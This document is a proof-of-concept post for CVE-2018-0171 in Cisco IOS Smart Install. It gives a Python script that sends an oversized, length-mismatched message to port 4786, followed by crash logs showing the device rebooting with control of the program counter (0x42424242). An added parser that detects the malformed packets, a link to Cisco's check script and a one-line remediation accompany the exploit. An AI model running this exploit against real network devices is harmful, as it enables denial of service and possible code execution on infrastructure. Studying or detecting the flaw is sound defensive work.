
Cisco IOS and IOS XE Software Smart Install usable PoC (CVE-2018-0171)

1. Straight to the code

# smi_ibc_init_discovery_BoF.py  (Python 2 script; indentation restored)

import socket
import struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    # TLV = 4-byte type, 4-byte length, value (big-endian)
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v

def send_packet(sock, packet):
    sock.send(packet)

def receive(sock):
    # recv() requires a buffer size; the original omitted it
    return sock.recv(4096)

if __name__ == "__main__":
    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con.connect((options.target, options.port))

    payload = 'BBBB' * 44
    shellcode = 'D' * 2048

    # inner length field at offset 36 claims more data than the TLV actually carries
    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload

    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode  # raw bytes appended after the TLV, no TLV header

    hdr = '\x00\x00\x00\x01'              # msg_from
    hdr += '\x00\x00\x00\x01'             # version
    hdr += '\x00\x00\x00\x07'             # msg_hdr_type (ibc_init_discovery)
    hdr += struct.pack('>I', len(data))   # data_length (understates the real body size)

    pkt = hdr + tlv_1 + tlv_2

    print "[*] Send a malicious packet"
    send_packet(con, pkt)
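
As an added example (not part of the original post or the PoC), a defender-side consistency check of the message layout the PoC above builds, of the kind a packet dissector or IDS rule for tcp/4786 would apply: it parses the 16-byte header and the TLVs and reports declared lengths that disagree with the bytes actually present. The header field order, the type-7 message and the inner length field at offset 36 of the type-1 TLV are taken from the PoC; the samples are constructed, not captured traffic.

```python
import struct

# Wire layout as used by the PoC above: four big-endian u32 header fields
# (msg_from, version, msg_hdr_type, data_length), then TLVs of u32 type, u32 length, value.
HDR_FMT, TLV_FMT = "!IIII", "!II"
HDR_LEN, TLV_LEN = struct.calcsize(HDR_FMT), struct.calcsize(TLV_FMT)
INIT_DISCOVERY = 7      # msg_hdr_type sent by the PoC
INNER_LEN_OFF = 36      # offset of the inner length field inside the type-1 TLV (from the PoC)

def inspect_smi_message(raw):
    """Return a list of findings for one Smart Install message; empty means consistent."""
    if len(raw) < HDR_LEN:
        return ["truncated header"]
    msg_from, version, msg_type, data_len = struct.unpack(HDR_FMT, raw[:HDR_LEN])
    body = raw[HDR_LEN:]
    findings = []
    if data_len != len(body):
        findings.append("data_length %d != actual body %d" % (data_len, len(body)))
    off = 0
    while off + TLV_LEN <= len(body):
        t, l = struct.unpack(TLV_FMT, body[off:off + TLV_LEN])
        if l > len(body) - off - TLV_LEN:
            findings.append("TLV type 0x%x length %d overruns message" % (t, l))
            break
        value = body[off + TLV_LEN:off + TLV_LEN + l]
        # Assumption taken from the PoC: in a type-7 message the type-1 value carries
        # its own length at offset 36, which must not exceed what actually follows it.
        if msg_type == INIT_DISCOVERY and t == 1 and len(value) >= INNER_LEN_OFF + 4:
            inner = struct.unpack("!I", value[INNER_LEN_OFF:INNER_LEN_OFF + 4])[0]
            remaining = len(value) - (INNER_LEN_OFF + 4)
            if inner > remaining:
                findings.append("inner length %d exceeds remaining TLV payload %d" % (inner, remaining))
        off += TLV_LEN + l
    if off != len(body):
        findings.append("%d trailing bytes after last TLV" % (len(body) - off))
    return findings

# Constructed samples (not captured traffic).
BENIGN = struct.pack(HDR_FMT, 1, 1, INIT_DISCOVERY, 12) + struct.pack(TLV_FMT, 1, 4) + b"\x00" * 4
_data = b"A" * 36 + struct.pack("!I", 176 + 2048 + 40) + b"BBBB" * 44   # same shape as the PoC
POC_LIKE = (struct.pack(HDR_FMT, 1, 1, INIT_DISCOVERY, len(_data))
            + struct.pack(TLV_FMT, 1, len(_data)) + _data + b"D" * 2048)

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("poc-like", POC_LIKE)):
        print(name, inspect_smi_message(msg) or "ok")
```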

2. Vulnerability verification

Cisco's official detection script:
https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

Then run the PoC directly.

3. Device reboot

Observe the system log: the SMI IBC server process hogs the CPU, then the device crashes, and frame 05 of the stack trace holds SP = PC = 0x42424242, the 'BBBB' pattern from the payload.
Queued messages:
Apr 8 15:30:47.244: %SYS-3-LOGGER_FLUSHING: System pausing to ensure console debugging output.

Apr 8 15:28:39.430: %SYS-3-CPUHOG: Task is running for (2328)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:41.758: %SYS-3-CPUHOG: Task is running for (4656)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:44.086: %SYS-3-CPUHOG: Task is running for (6984)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:46.414: %SYS-3-CPUHOG: Task is running for (9312)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FBCz 0x1EC15ACz
Apr 8 15:28:48.741: %SYS-3-CPUHOG: Task is running for (11640)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FBCz 0x1EC15ACz
Apr 8 15:30:57.999: %SYS-3-CPUHOG: Task is running for (12804)msecs, more than (2000)msecs (16/0),process = SMI IBC server process.
-Traceback= 0x2E264C0z
Cisco IOS Software, C2960X Software (C2960X-UNIVERSALK9-M), Version 15.2(2)E3, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 26-Aug-15 07:12 by prod_rel_team

Debug Exception (Could be NULL pointer dereference) Exception (0x2000)!
SRR0 = 0x02749DBC SRR1 = 0x00029200 SRR2 = 0x02E31488 SRR3 = 0x00029200
ESR = 0x00000000 DEAR = 0x7FB2B21B TSR = 0x84000000 DBSR = 0x01000000

CPU Register Context:
Vector = 0x00002000 PC = 0x02E31488 MSR = 0x00029200 CR = 0x33005053
LR = 0x02E31488 CTR = 0x021ABFD0 XER = 0xC0000067
R0 = 0x02E31488 R1 = 0x06DC6BF4 R2 = 0x00000000 R3 = 0x05825B4C
R4 = 0x00000000 R5 = 0xA0000000 R6 = 0x00000000 R7 = 0x0000493C
R8 = 0x00000000 R9 = 0x00000000 R10 = 0x04440000 R11 = 0x04440000
R12 = 0x33005055 R13 = 0x0F183214 R14 = 0x03BE5A88 R15 = 0x03BE5968
R16 = 0x04EE1478 R17 = 0x06DC6DD8 R18 = 0x03BE5A48 R19 = 0x06DC6DC8
R20 = 0x04440000 R21 = 0x00000001 R22 = 0x04EE0000 R23 = 0x077CC254
R24 = 0x077DD694 R25 = 0x06DC6C80 R26 = 0x000000D8 R27 = 0x06DC6CA0
R28 = 0x06DC6C9C R29 = 0x00000000 R30 = 0x041EBD0C R31 = 0x00000000

Stack trace:
PC = 0x02E31488, SP = 0x06DC6BF4
Frame 00: SP = 0x06DC6C04 PC = 0x02E31488
Frame 01: SP = 0x06DC6C14 PC = 0x02E29B44
Frame 02: SP = 0x06DC6C2C PC = 0x02E34088
Frame 03: SP = 0x06DC6C78 PC = 0x02E25D4C
Frame 04: SP = 0x06DC6CD8 PC = 0x015D4A24
Frame 05: SP = 0x42424242 PC = 0x42424242

4. Remediation

Upgrade to a fixed release, or disable the Smart Install (SMI) protocol.